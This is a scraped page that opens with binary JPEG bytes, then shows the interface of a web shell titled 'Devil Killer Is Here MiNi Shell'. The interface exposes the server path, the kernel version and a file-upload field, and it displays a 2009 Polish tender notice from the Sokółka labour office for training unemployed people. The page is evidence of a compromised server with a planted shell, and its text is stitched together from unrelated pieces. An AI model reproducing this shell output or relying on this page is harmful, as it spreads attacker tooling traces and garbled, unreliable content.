JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27971-N-2009.html

<p class="kh_header"><b>Sokółka: Postępowanie o udzielenie zamówienia publicznego na przeprowadzenie szkoleń osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 27971 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Kryńska 40, 16-100 Sokółka, woj. podlaskie, tel. 085 722 90 10, faks 085 722 90 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupsokolka.pl; http://pup.sokolka.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na przeprowadzenie szkoleń osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych, finansowanych ze środków Funduszu Pracy i Europejskiego Funduszu Społecznego, w następujących kierunkach:

1) Działalność gospodarcza od podstaw (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 1 Część A do SIWZ - Część I zamówienia;

2) ABC przedsiębiorczości z modułem księgowości dla małych firm (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 2 Część A do SIWZ - Część II zamówienia;

3) Operator sprzętu ciężkiego (Operator koparkoładowarki kl. III i Operator ładowarki kl. III) (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 3 Część A do SIWZ - Część III zamówienia;

4) Robotnik drogowy (Robotnik drogowy i Robotnik z elementami układania kostki brukowej) (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 4 Część A do SIWZ - Część IV zamówienia;

5) Tynkarz elewacji zewnętrznych - docieplanie budynków (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 5 Część A do SIWZ - Część V zamówienia;

6) Spawanie stali metodą MIG/MAG (Spawanie stali metodą MIG i Spawanie stali metodą MAG) (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 6 Część A do SIWZ - Część VI zamówienia;

7) Sprzedawca-fakturzysta z modułem profesjonalnej obsługi klienta 
(CPV 80510000-2) -opis przedmiotu zamówienia zawiera Załącznik Nr 7 Część A do SIWZ - Część VII zamówienia;

8) Cukiernik-ciastkarz (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 8 Część A do SIWZ - Część VIII zamówienia;

9) Prawo jazdy kategorii C, C+E, D od B i D od C (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 9 Część A do SIWZ - Część IX zamówienia;

10) Kucharz z modułem zdobienia potraw i carvingu (CPV 80530000-8) - opis przedmiotu zamówienia zawiera Załącznik Nr 10 Część A do SIWZ - Część X zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 w/w ustawy, oraz złożyli wymagane oświadczenia i przedłożyli niezbędne dokumenty określone w punkcie VI i VII Specyfikacji Istotnych Warunków Zamówienia;
5) akceptują warunki zawarte we wzorze umowy załączonej do Specyfikacji Istotnych Warunków Zamówienia na poszczególne części zamówienia;
6) widnieją w rejestrze instytucji szkoleniowych prowadzonym przez wojewódzkie urzędy pracy (zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy);
7) spełniają wszystkie wymagania zawarte w Specyfikacji Istotnych Warunków Zamówienia.
W przypadku składania ofert przez firmy występujące wspólnie, każda z tych firm musi spełniać ww. warunki.

2. Z ubiegania się o zamówienie publiczne wyklucza się wykonawców, którzy:
1) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy prawo zamówień publicznych opisanych w pkt 1 ppkt 1) do 4);
2) podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych;
3) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji;
4) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
5) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem 
art. 26 ust. 3 ustawy Prawo zamówień publicznych;
6) nie zgodzili się na przedłużenie okresu związania ofertą. 

3. Zamawiający odrzuca ofertę, jeżeli:
1) jest niezgodna z ustawą;
2) jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy Prawo zamówień publicznych;
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia;
6) zawiera błędy w obliczeniu ceny;
7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia, nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Prawo zamówień publicznych;
8) jest nieważna za podstawie odrębnych przepisów.

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

5. Ocena spełniania warunków udziału w postępowaniu będzie dokonana przez zamawiającego na podstawie przedłożonych dokumentów i na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełnienia warunków określonych w pkt. V pkt. 1 niniejszego SIWZ, Wykonawca winien przedłożyć niżej wymienione dokumenty i oświadczenia w formie oryginału lub kopii poświadczonej za zgodność z oryginałem:

1. w celu weryfikacji warunku zawartego w pkt. V pkt.1. ppkt. 1) SIWZ: 
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

2. w celu weryfikacji warunku zawartego w pkt. V pkt.1. ppkt. 2) SIWZ: 
1) wykaz osób które będą wykonywać zamówienie, zgodnie z Załącznikiem Nr 2 do poszczególnych formularzy ofertowych. Nie należy przedstawiać listy wszystkich wykładowców zatrudnianych przez Wykonawcę. Do wykazu należy dołączyć oświadczenia osób, które będą prowadziły szkolenie, iż zostali oni poinformowani o prowadzeniu przez nich szkolenia dla osób bezrobotnych organizowanego przez Powiatowy Urzad Pracy w Sokółce.

3. W celu weryfikacji warunku zawartego w pkt. V pkt.1. ppkt. 4) SIWZ: 
1) oświadczenie Wykonawcy o spełnianiu warunków formalnych określonych w art. 22 oraz o niepodleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), stanowiące Załącznik Nr 6 do poszczególnych formularzach ofertowych;

4. w celu weryfikacji warunku zawartego w pkt. V pkt.1. ppkt. 5) SIWZ: 
1) oświadczenie Wykonawcy o akceptowaniu warunków zawartych we wzorze umowy załączonej do Specyfikacji Istotnych Warunków Zamówienia, zawarte w poszczególnych formularzach ofertowych na realizację wybranej części zamówienia;

5. w celu weryfikacji warunku zawartego w pkt. V pkt.1. ppkt. 6) SIWZ: 
1) zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy (oryginał lub kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 10</li>
<li>2 - Program szkolenia + zaproponowane przez instytucję szkoleniową rozszerzenie na rzecz podwyższenia jakości szkolenia - 20</li>
<li>3 - Kwalifikacje i doświadczenie zawodowe proponowanej kadry dydaktycznej - 20</li>
<li>4 - Posiadanie przez instytucję szkoleniową certyfikatów jakości usług - 15</li>
<li>5 - Warunki lokalowe, wyposażenie techniczne i materiały dydaktyczne - 10</li>
<li>6 - Miejsce szkolenia - 5</li>
<li>7 - Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>8 - Sposób sprawdzania efektów szkolenia - 5</li>
<li>9 - Rodzaj dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji - 5</li>
<li>10 - Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.sokolka.sisco.info/; http://pupsokolka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Sokółce, ul. Kryńska 40, 16 - 100 Sokółka, pok. 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Sokółce, ul. Kryńska 40, pok. nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 10.03.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część II zamówienia, Część VI zamówienia oraz Część X zamówienia będą finansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Część I zamówienia oraz Część IX zamówienia będą w części finansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie: Działalność gospodarcza od podstaw.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane: miasto Sokółka.

2. Termin szkolenia:

I kwartał: II połowa marca 2009 roku - I grupa (finansowane z EFS);
II kwartał: kwiecień 2009 roku - II grupa (finansowane z EFS);
III kwartał: lipiec 2009 roku - III grupa (finansowane z Funduszu Pracy);
IV kwartał: październik 2009 roku - IV grupa (finansowane z Funduszu Pracy).
przy czym Zamawiający zastrzega możliwość zmiany ww. wskazanych terminów.

3. Liczba dni szkolenia: max. 7 kolejnych dni dla jednej grupy szkoleniowej.

4. Ilość uczestników szkoleń: minimum 30 osób ogółem.

5. Ilość kursów: minimum 1 w kwartale roku 2009.

6. Zajęcia odbywać się powinny w 1 grupie szkoleniowej po minimum 7 osób w grupie.

7. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 

8. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 40 godzin, z czego część teoretyczna powinna obejmować minimum 20 godzin, natomiast praktyczna: minimum 20 godzin.

9. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

10. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) i powinien obejmować co najmniej wymagane minimum programowe zamieszczone poniżej:

1. Zarządzanie firmą	
        1.	Rejestrowanie działalności (prezentacja dokumentów oraz instruktaż ich wypełniania; omówienie PKD wraz z konsekwencjami podatkowymi wiążącymi się z wyborem konkretnych branż i działów);
        2.	Prawne uwarunkowania prowadzenia działalności gospodarczej (podstawy prawa cywilnego oraz prawa pracy, podstawowe zasady wynikające z ustawy o swobodzie działalności);
        3.	Podstawy wiedzy o zarządzaniu organizacją (informacja i komunikacja, styl kierowania, proces decyzyjny);
        4.	Prowadzenie negocjacji; 
        5.	Zarządzanie strategiczne (strategia firmy, określenie celu, elementy analizy SWOT).
        6.	Wypełnianie dokumentów (ZUS, US itp.) przy rejestracji działalności gosp. ;

2. Zarządzanie finansami w małej firmie
          1.	Dokumentacja księgowa i uproszczona ewidencja księgowa;
          2.	Ryczałt i karta podatkowa;
          3.	Pełne księgi handlowe;
          4.	Zarządzanie przepływem gotówki;
          5.	Źródła finansowania działalności gospodarczej małych firm;
          6.	Analiza finansowa firmy;

3. Opracowanie i tworzenie biznes planu	
         1.	Pomysł na biznes;
         2.	Cel, istota i uwarunkowania tworzenia biznes planu;
         3.	Elementy biznes planu;
         4.	Zakres i metodologia wykonania poszczególnych części biznes planu;
         5.	Przykładowy biznesplan;
         6.	Praktyczne warsztaty - pisanie własnych biznesplanów;
         7.	Wypełnianie wniosków o przyznanie jednorazowo środków na podjęcie działalności gospodarczej przez urzędy pracy;

4. Instytucje i system wsparcia przedsiębiorczości. Źródła finansowania działalności
         1. Możliwości kredytowania;
         2.	Możliwości i warunki ubiegania się o dotacje PUP;
         3.	Fundusze pożyczkowe w  woj. podlaskim;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie: ABC przedsiębiorczości z modułem księgowania dla małych firm.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce szkolenia: preferowane: miasto Dąbrowa Białostocka.

2. Wymagane jest, aby szkolenie było realizowane w dwóch terminach:
          a.	I termin: II połowa marca i I połowa kwietnia 2009 roku (I grupa);
          b.	II termin: lipiec 2009 (II grupa);
przy czym Zamawiający zastrzega możliwość zmiany ww. wskazanych terminów.

3. Liczba dni szkolenia: max. 15 kolejnych dni dla każdej grupy szkoleniowej.

4. Ilość uczestników szkoleń: minimum 16 osób ogółem po minimum 8 osób w grupie.

5. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 

6. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 90 godzin, z czego część teoretyczna powinna obejmować minimum 45 godzin, natomiast praktyczna: minimum 45 godzin.

7. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

8. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl)  i powinien obejmować co najmniej wymagane minimum programowe zamieszczone w poniżej:

1. Aspekty prawne prowadzenia działalności gospodarczej	
     1.Podstawy prawne prowadzenia  działalności gospodarczej.
     2.Formy  prowadzenia działalności gospodarczej.
     3.Umowy funkcjonujące w obrocie gospodarczym.
     4. Ustawa prawo zamówień publicznych- możliwości udziału w przetargach

2.Jak rozpocząć własną działalność gospodarczą
     1.Dobry pomysł na biznes
     2.Tworzenie planu przedsięwzięcia
        tj. biznes-planu
        -cel i istota tworzenia biznes-planu
        -elementy biznes-planu
        - analiza otoczenia SWOT
        -pisanie własnych biznes-planów

3. Rejestracja działalności gospodarczej 
   1.Wpis do ewidencji działalności gospodarczej  lub Krajowego Rejestru Sądowego
   2. Uzyskanie nr REGON
   3. Zgłoszenie płatnika składek ZUS
   4. Wybór formy rozliczenia z Urzędem Skarbowym i uzyskanie nr NIP
   5. Otwarcie i prowadzenie rachunku bankowego
   6. Zgłoszenie do Państwowej Inspekcji Pracy i Państwowej Inspekcji Sanitarnej 

4. Marketing w małej firmie	
    1. Zasady marketingu i marketing-mix:
       - sposoby badania rynku pracy
       -analiza konkurencji
       - reklama
    2. Public-relation
    3. Prowadzenie negocjacji

5. Elementy prawa pracy	
    1. Omówienie wybranych zagadnień i problemów  na podstawie przepisów Kodeksu Pracy i Kodeksu Cywilnego

6. Księgowość małych firm
    1. Wybrane elementy prawa gospodarczego w praktyce.
    2.Wybrane zagadnienia z  rachunkowości
       - dowody księgowe
       -prawidłowa identyfikacja zdarzeń gospodarczych
       -dokumentacja i ewidencja środków trwałych i obrotowych,
    3.Sporządzenie bilansu.
    4.Przeprowadzenie remanentu.
    5. Analiza finansowa firmy.

7. Formy  ewidencji działalności gospodarczej  w praktyce	
    1. Formy opodatkowania i ewi-encji działalności gospodarczej:
       - podatkowa księga przychodów i rozchodów
       -  zryczałtowany podatek dochodowy w formie karty podatkowej,
       - ryczałt od przychodów ewidencjonowanych,
       - zryczałtowany podatek dochodowy w formie karty podatkowej

8. Rozliczenia z  Urzędem Skarbowym i ZUS	
     1.Naliczanie i odprowadzanie podatku  do Urzędu Skarbowego.
     2. Naliczanie miesięcznych zaliczek podatku zryczałtowanego.
     3. Sporządzanie deklaracji podatkowych.
     4.Naliczanie i odprowadzanie podatku w przypadku, gdy jest się podatnikiem VAT.
     5. Rozliczenia z ZUS.

9. Źródła finansowania działalności firmy	
    1. Instytucje i system wsparcia przedsiębiorczości.
    2. Zewnętrzne źródła finansowania
       - możliwości kredytowania,
       - Fundusze unijne 2007-2013
       - inne formy wsparcia

10. Wykorzystanie komputera w prowadzeniu firmy 
      Praktyczne zastosowanie programów komputerowych ułatwiających funkcjonowanie firmy: Płatnik, program kadrowo-płacowy, księgowy, Excel.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie: Operator sprzętu ciężkiego (operator koparkoładowarki kl. III i Operator ładowarki kl. III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie pn. Operator koparkoładowarki kl. III
1. Miejsce szkolenia: preferowane województwo podlaskie.
2. Termin szkolenia: II połowa marca - maj 2009 roku.
3. Liczba dni szkolenia: max. 25 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 4 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 170 godzin, z czego część teoretyczna powinna obejmować minimum 110 godzin, natomiast praktyczna: minimum 60 godzin.
8. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl)  oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz. 1263).
9. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia.

Szkolenie pn. Operator ładowarki kl. III
1. Miejsce szkolenia: preferowane województwo podlaskie.
2. Termin szkolenia: II połowa marca - maj 2009 roku.
3. Liczba dni szkolenia: max. 25 kolejnych dni dla jednej grupy szkoleniowej.
4. Ilość uczestników szkolenia: minimum 8 osób.
5. Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia powinny być realizowane wg planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. 4 - 6 razy w tygodniu, nie więcej niż po 8 godzin. 
7. Łączna liczba godzin lekcyjnych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: minimum 170 godzin, z czego część teoretyczna powinna obejmować minimum 110 godzin, natomiast praktyczna: minimum 60 godzin.
8. Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl) oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz. 1263).
9. Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia oraz przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
